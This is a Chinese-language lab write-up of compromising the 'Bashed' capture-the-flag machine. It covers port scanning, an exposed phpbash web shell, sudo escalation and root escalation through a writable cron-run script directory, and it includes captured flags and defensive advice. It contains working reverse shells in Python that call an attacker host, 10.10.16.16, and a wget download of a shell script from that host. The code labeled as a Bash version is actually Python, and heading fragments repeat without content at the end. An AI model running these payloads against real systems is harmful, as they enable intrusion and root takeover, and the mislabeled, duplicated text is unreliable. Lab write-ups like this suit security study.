Bashed PHP Bash+Python计划任务权限提升技术分析<\/h1>

1. 信息收集阶段<\/h2>

1.1 端口扫描<\/h3>

使用masscan和nmap进行快速扫描：<\/p>

$ sudo masscan -p1-65535,U:1-65535 10.10.10.68 --rate=<\/span>1000<\/span> -p1-65535,U:1-65535 -e tun0 > \/tmp\/ports
<\/span><\/span>$ ports=<\/span>$(<\/span>cat \/tmp\/ports | awk -F " "<\/span> '{print $4}'<\/span> | awk -F "\/"<\/span> '{print $1}'<\/span> | sort -n | tr '\n'<\/span> ','<\/span> | sed 's\/,$\/\/'<\/span>)<\/span>
<\/span><\/span>$ nmap -Pn -sV -sC -p$ports 10.10.10.68
<\/span><\/span><\/code><\/pre>扫描结果显示：<\/p>

80\/tcp: Apache httpd 2.4.18 (Ubuntu)<\/li>
<\/ul>
1.2 Web目录枚举<\/h3>
使用dirsearch工具发现敏感目录：<\/p>
$ dirsearch -u http:\/\/10.10.10.68
<\/span><\/span><\/code><\/pre>发现重要路径：<\/p>

http:\/\/10.10.10.68\/dev\/<\/li>
http:\/\/10.10.10.68\/dev\/phpbash.php<\/li>
<\/ul>
2. 初始访问<\/h2>
2.1 利用phpbash.php获取Web Shell<\/h3>
访问phpbash.php<\/code>可直接获得一个交互式Web Shell，这是一个非常危险的漏洞，允许攻击者直接执行系统命令。<\/p>
3. 权限提升：www-data → scriptmanager<\/h2>
3.1 检查sudo权限<\/h3>
在获得的shell中执行：<\/p>
$ sudo -l
<\/span><\/span><\/code><\/pre>检查当前用户(www-data)可以以哪些用户身份执行哪些命令。<\/p>
3.2 利用sudo权限<\/h3>
发现可以以scriptmanager身份执行reverse.sh脚本：<\/p>
$ sudo -u scriptmanager .\/reverse.sh
<\/span><\/span><\/code><\/pre>通过这种方式提升到scriptmanager用户权限。<\/p>
4. 权限提升：scriptmanager → root<\/h2>
4.1 监控进程<\/h3>
使用pspy工具监控系统进程：<\/p>
$ .\/pspy32
<\/span><\/span><\/code><\/pre>发现系统中有定期执行的Python脚本任务。<\/p>
4.2 利用计划任务漏洞<\/h3>
发现\/scripts目录下有Python脚本被root定期执行：<\/p>

进入\/scripts目录：<\/li>
<\/ol>
$ cd \/scripts
<\/span><\/span><\/code><\/pre>
创建恶意Python反向shell脚本(1.py)：<\/li>
<\/ol>
import<\/span> os,<\/span>pty,<\/span>socket
<\/span><\/span>s=<\/span>socket.<\/span>socket()
<\/span><\/span>s.<\/span>connect(("10.10.16.16"<\/span>,443<\/span>))
<\/span><\/span>[os.<\/span>dup2(s.<\/span>fileno(),f)for<\/span> f in<\/span>(0<\/span>,1<\/span>,2<\/span>)]
<\/span><\/span>pty.<\/span>spawn("bash"<\/span>)
<\/span><\/span><\/code><\/pre>
或者下载预制的反向shell脚本：<\/li>
<\/ol>
$ wget http:\/\/10.10.16.16\/reverse.py
<\/span><\/span><\/code><\/pre>
等待计划任务执行，获取root权限的shell。<\/li>
<\/ol>
5. 获取flag<\/h2>

用户flag：8f7df2f47989e214ab11a888ee378946<\/code><\/li>
root flag：96c6dadfc0c09eb783c4d2e614205ef9<\/code><\/li>
<\/ul>
6. 漏洞总结与防御建议<\/h2>
6.1 漏洞点<\/h3>

Web服务器暴露了phpbash.php这样的危险文件<\/li>
配置不当的sudo权限<\/li>
不安全的计划任务实现(脚本可被非特权用户修改)<\/li>
<\/ol>
6.2 防御措施<\/h3>

定期检查并清理Web目录中的危险文件<\/li>
严格配置sudo权限，遵循最小权限原则<\/li>
计划任务脚本应设置为root所有且不可被其他用户修改<\/li>
计划任务脚本所在目录应设置适当权限(700)<\/li>
使用完整性检查工具监控关键系统文件变更<\/li>
<\/ol>
7. 扩展知识<\/h2>
7.1 反向Shell技术<\/h3>
本案例中使用了两种反向shell技术：<\/p>

Bash版本：<\/li>
<\/ol>
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.16.16",445));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("bash")'<\/span>
<\/span><\/span><\/code><\/pre>
Python版本：<\/li>
<\/ol>
import<\/span> os,<\/span>pty,<\/span>socket
<\/span><\/span>s=<\/span>socket.<\/span>socket()
<\/span><\/span>s.<\/span>connect(("10.10.16.16"<\/span>,443<\/span>))
<\/span><\/span>[os.<\/span>dup2(s.<\/span>fileno(),f)for<\/span> f in<\/span>(0<\/span>,1<\/span>,2<\/span>)]
<\/span><\/span>pty.<\/span>spawn("bash"<\/span>)
<\/span><\/span><\/code><\/pre>7.2 计划任务监控<\/h3>
使用pspy等工具可以监控系统计划任务而不需要root权限，是权限提升的重要信息收集手段。<\/p>

Bashed PHP Bash+Python计划任务权限提升技术分析<\/h1>

1. 信息收集阶段<\/h2>

2. 初始访问<\/h2>

2.1 利用phpbash.php获取Web Shell<\/h3> 访问phpbash.php<\/code>可直接获得一个交互式Web Shell，这是一个非常危险的漏洞，允许攻击者直接执行系统命令。<\/p>

4. 权限提升：scriptmanager → root<\/h2>

6. 漏洞总结与防御建议<\/h2>

7. 扩展知识<\/h2>

7.2 计划任务监控<\/h3> 使用pspy等工具可以监控系统计划任务而不需要root权限，是权限提升的重要信息收集手段。<\/p>

2.1 利用phpbash.php获取Web Shell<\/h3>
访问`phpbash.php<\/code>可直接获得一个交互式Web Shell，这是一个非常危险的漏洞，允许攻击者直接执行系统命令。<\/p>`

7.2 计划任务监控<\/h3>
使用pspy等工具可以监控系统计划任务而不需要root权限，是权限提升的重要信息收集手段。<\/p>